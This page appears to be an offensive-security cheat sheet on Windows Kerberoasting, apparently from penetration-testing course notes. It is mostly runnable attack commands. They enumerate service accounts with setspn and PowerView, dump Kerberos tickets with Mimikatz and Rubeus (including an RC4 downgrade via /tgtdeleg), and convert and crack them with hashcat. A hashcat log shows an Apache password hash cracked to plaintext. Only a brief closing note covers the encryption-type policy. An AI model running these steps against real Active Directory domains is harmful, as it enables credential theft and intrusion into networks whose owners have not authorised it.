🪟Windows - Kerberoasting

setspn.exe

Enumerating SPNs with setspn.exe

setspn.exe -Q */*

Targeting a Single User

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Note: We can also choose to retrieve all tickets using the same method, but this will also pull all computer accounts, so it is not optimal.

Mimikatz

Extracting Tickets from Memory with Mimikatz

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

Preparing the Base64 Blob for Cracking

echo "<base64 blob>" |  tr -d \\n

Placing the Output into a File as .kirbi

cat encoded_file | base64 -d > sqldev.kirbi

kirbi2john.py

https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py

Extracting the Kerberos Ticket using kirbi2john.py

python2.7 kirbi2john.py sqldev.kirbi

Hashcat

reference

https://www.a6n.co.uk/2021/06/ntds-password-hash-dumping.html

Modifiying crack_file for Hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Cracking the Hash with Hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

hashcat --example-hashes

code

hashcat --example-hashes | grep apr1

example

┌──(19:55:31 eo㉿offsec)-[/usr/share/wordlists]
└─$ hashcat --example-hashes | grep apr1
  Name................: Apache $apr1$ MD5, md5apr1, MD5 (APR)
  Example.Hash........: $apr1$62722340$zGjeAwVP2KwY6MtumUI1N/

--user

code

hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --user

example

┌──(20:03:47 eo㉿offsec)-[~/pgp/AuthBy]
└─$ hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --user
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz, 2917/5899 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
* Passwords.: 100000
* Bytes.....: 781879
* Keyspace..: 100000
* Runtime...: 0 secs

$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite               
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Time.Started.....: Wed Dec  7 20:04:04 2022 (0 secs)
Time.Estimated...: Wed Dec  7 20:04:04 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    20697 H/s (11.85ms) @ Accel:256 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5120/100000 (5.12%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4096/100000 (4.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678q -> amateurs
Hardware.Mon.#1..: Util: 32%

Started: Wed Dec  7 20:03:50 2022
Stopped: Wed Dec  7 20:04:06 2022

Powerview

Using PowerView to Extract TGS Tickets

Import-Module .\PowerView.ps1

Get-DomainUser * -spn | select samaccountname

Using PowerView to Target a Specific User

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Rubeus

 .\Rubeus.exe

Using the /stats Flag

.\Rubeus.exe kerberoast /stats

Using the /nowrap Flag

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Using the /user Flag

.\Rubeus.exe kerberoast /user:testspn /nowrap

Using the /tgtdeleg Flag

.\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap

Note:

When supplying the /tgtdeleg flag, the tool requested an RC4 ticket even though the supported encryption types are listed as AES 128/256
Does not work against a Windows Server 2019 Domain Controller

Encryption Types

Encryption

Hash Type

RC24

$krb5tgs$23$*

AES-256

$krb5tgs$18$*

AES-128

$krb5tgs$17$*

msDS-SupportedEncryptionTypes

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Decimal Value

Hex Value

0x0

Not defined - defaults to RC4_HMAC_MD5

Cracking the Ticket with Hashcat & rockyou.txt

hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt

Checking Supported Encryption Types

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Requesting a New Ticket

.\Rubeus.exe kerberoast /user:testspn /nowrap

Running Hashcat & Checking the Status of the Cracking Job

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

https://hashcat.net/wiki/doku.php?id=example_hashes

Edit Encryption Types

Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

Network security: Configure encryption types allowed for Kerberos

PreviousLinux - Kerberoasting NextExercise

Last updated 3 years ago

hashtagsetspn.exe

hashtagEnumerating SPNs with setspn.exe

hashtagTargeting a Single User

hashtagRetrieving All Tickets Using setspn.exe

hashtagMimikatz

hashtagExtracting Tickets from Memory with Mimikatz

hashtagPreparing the Base64 Blob for Cracking

hashtagPlacing the Output into a File as .kirbi

hashtagkirbi2john.py

hashtagExtracting the Kerberos Ticket using kirbi2john.py

hashtagHashcat

hashtagModifiying crack_file for Hashcat

hashtagCracking the Hash with Hashcat

hashtaghashcat --example-hashes

hashtag--user

hashtagPowerview

hashtagUsing PowerView to Extract TGS Tickets

hashtagUsing PowerView to Target a Specific User

hashtagExporting All Tickets to a CSV File

hashtagRubeus

hashtagUsing the /stats Flag

hashtagUsing the /nowrap Flag

hashtagUsing the /user Flag

hashtagUsing the /tgtdeleg Flag

hashtagEncryption Types

hashtagmsDS-SupportedEncryptionTypes

hashtagCracking the Ticket with Hashcat & rockyou.txt

hashtagChecking Supported Encryption Types

hashtagRequesting a New Ticket

hashtagRunning Hashcat & Checking the Status of the Cracking Job

hashtagEdit Encryption Types